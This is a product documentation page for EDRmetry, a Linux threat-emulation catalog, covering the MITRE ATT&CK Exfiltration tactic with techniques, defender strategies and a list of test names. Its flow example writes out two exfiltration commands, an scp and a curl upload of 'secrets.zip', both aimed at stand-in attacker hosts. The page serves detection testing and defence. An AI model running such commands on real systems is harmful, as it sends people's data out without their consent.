EDRmetry Linux Matrix For Download / Self-Hosted - Comprehensive Hands-On Attack TTPs Catalog
- Buy now
- Learn more
1. EDRmetry Overview

Introduction
What you will get?
Goals / What to expect
EDRmetry Matrix
Virtual Machines / C2
EDRmetry Generic Flow
Contextual Execution
Changelog / Updates
2. EDRmetry Deployment

Deploy your EDRmetry Matrix Docker Container
Download EDRmetry Matrix JSON Database
Import your EDRmetry Matrix JSON Database
Provision your TARGET_X VM
Provision your KALI_X or C2_X VM
Request for HTTPS Hosted Access to EDRmetry Matrix
3. Research and emulation of Linux threats

MITRE ATT&CK TACTICS in the Linux Ecosystem
Linux Threat Landscape
Initial Access - TA0001
Discovery - TA0007
Execution - TA0002
Defense Evasion - TA0005
Persistence - TA0003
Privilege Escalation - TA0004
Exfiltration - TA0010
Command and Control - TA0011
Lateral Movement - TA0008
Credentials Access - TA0006
Impact - TA0040
Collection - TA0009

Exfiltration - TA0010

Objective:

Steal collected data from the target environment. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
ID: TA0010
- https://attack.mitre.org/tactics/TA0010/

Linux Context:

Exfiltration leverages SSH (scp, sftp), FTP, or cloud uploads (e.g., aws s3 cp). Data is often compressed gzip, taror encrypted openssl enc to evade detection. Covert channels like ICMP tunneling or DNS exfiltration bypass firewalls, while attackers throttle transfers to avoid bandwidth alerts. In cloud environments, misconfigured S3 buckets or SFTP servers become drop points.

Key Techniques:

Exfiltration Over C2 Channel (T1041): Sending data via existing C2.
Exfiltration Over Alternative Protocol (T1048): Using SCP or FTP.
Data Transfer Size Limits (T1030): Chunking data to avoid detection.

Flow Example:

Running scp -i key data.tar.gz attacker@remote:/tmp or curl -F "file=@secrets.zip" http://drop.site.

Defender Strategies:

Monitor egress with NIDS/FPC, enforce DLP policies, and restrict cloud API access. Audit SSH logs for large transfers.

The current list of corresponding EDRmetry test definitions includes:

EDR-T6307 - DNS Exfiltration with dig
EDR-T6115 - DNS Tunneling/Exfiltration with dnscat2
EDR-T6169 - eBPF Magic String Tracepoint Execution with bpftrace
EDR-T6136 - Exfil data using rsync
EDR-T6137 - Exfil data using transfer.sh
EDR-T6342 - Exfil data with AWS S3
EDR-T6211 - ICMP Python Scapy Exfiltration
EDR-T6168 - ICMP_exfil + nping Exfiltration
EDR-T6112 - NTP Data Exfiltration
EDR-T6103 - PAM creds over HTTP Post
EDR-T6234 - pam_exec SSHD Exfiltration
EDR-T6120 - Python FTP Upload
EDR-T6180 - SMB Data Exfiltration with impacket
EDR-T6257 - Telegram Data Exfiltration
EDR-T6052 - Upload data over HTTP/HTTPS
EDR-T6021 - Upload data over SCP/SFTP
EDR-T6135 - Upload data over WebDAV
EDR-T6181 - Upload/download data over SSHFS